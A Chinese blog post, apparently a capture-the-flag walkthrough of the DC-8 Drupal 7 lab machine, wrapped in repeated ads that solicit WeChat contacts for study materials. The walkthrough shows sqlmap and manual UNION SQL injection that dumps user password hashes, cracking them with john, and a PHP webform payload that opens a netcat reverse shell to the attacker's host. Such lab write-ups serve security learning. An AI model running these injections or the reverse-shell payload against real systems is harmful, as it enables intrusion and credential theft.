DC-8 Drupal7,网络安全面试相关文章及Github学习资料

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

sudo arp-scan -l

ip为192.168.146.146

浏览网页 cms是Drupal7

网页显示:

在接下来的几周内,本网站将出现中断,同时我们将解决一些悬而未决的问题。

对于给您带来的不便,我们深表歉意。

端口扫描

nmap -A -sV -p- 192.168.146.146

隐藏目录扫描

获取后台登录页面,dirb http://192.168.146.146 -X.php没发现啥有用的

dirsearch -u http://192.168.146.146 -i 200

-i保留响应状态码(不同状态码用逗号分隔,可指定范围,如-i 200,300-400)
-x排除响应状态码(可指定范围,如-x 400,400-500)

403无法访问,301资源被永久转移无法访问,只有200可用

/user/login/是登录界面

robots.txt文件是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限

发现点击details下面的3个连接,

url中会出现参数,nid=1

在url后面加’,出现数据库报错

有sql注入漏洞,用sqlmap

sqlmap -u “http://192.168.146.146/?nid=1” --level=5 --risk=3 --batch --current-db

–batch 操作默认选择为y

查看当前使用的数据库–current-db

检测注入点 sqlmap -u ‘http://xx/?id=1’

数据库名d7db

布尔盲注、报错注入、时间盲注、联合注入

查看表名

-D指定数据库、–tables列出表

sqlmap -u “http://192.168.146.146/?nid=1” --level=5 --risk=3  -D ‘d7db’ --tables

有users表

-T指定数据表、–columns列出所有字段

sqlmap -u “http://192.168.146.146/?nid=1” --level=5 --risk=3  -D ‘d7db’ -T ‘users’ -columns(这样运行,没有显示结果)

sqlmap -u “http://192.168.146.146/?nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -T ‘users’ -columns(这样才会有结果)

有name和pass

-C 列名 在-D -T情况下输出某列数据的值、–dump 拉取数据存放到本地,获取值,也就是表中的数据

sqlmap -u “http://192.168.146.146/?nid=1” --level=5 --risk=3 --batch -D ‘d7db’ -T ‘users’ -C ‘name,pass’ --dump(这个不行)

sqlmap -u “http://192.168.146.146/?nid=1” -D d7db -T users -C name,pass --dump(这样有结果)

有2个用户admin和join

手工注入暴库方法

参考<渗透练习>DC-8靶机渗透实验_渗透练习dc-8-CSDN博客

数据库名nid=0 union select database()

数据库表nid=0 union select group_concat(table_name) from
information_schema.tables where table_schema=database()

user表字段 nid=0 union select group_concat(column_name) from
information_schema.columns where table_name=’users’ and
table_schema=database()

数据nid=0 union select group_concat(name,pass) from users

john

用户名为john,提示我们用john ,一个基于字典的快速破解密码的工具,是一款用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等

把两个密文写进文件pass.txt

用echo没反应直接用vi

echo “ S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z” > pass.txt

echo “ S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF” >>pass.txt

暴破密码

john pass.txt

解密出一个口令,turtle ,我猜是john用户的,因为admin不会这么容易拿到

试试远程登录

ssh john@192.168.146.146 没成功

后台登陆

观察在edit 可以上传图片用作用户的虚拟面孔,但是要是上传木马图片,不知道路径在哪

在find content点击contact us edit点击webfrom 再点击from settings可以添加php代码

上面的语句,是我们contact us提交内容出现的

目录http://192.168.146.146/node/3/done?sid=1

在里边输入 让dc8连接我们的kal主机,并创建一个shell

木马<?php system("nc 192.168.146.140 5556 -e /bin/bash"); ?>

是kali的ip

监听5556端口nc -lvp 5556

之前一直没成功,把ip写错了

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-oTWraAf9-1713125742362)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 11
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值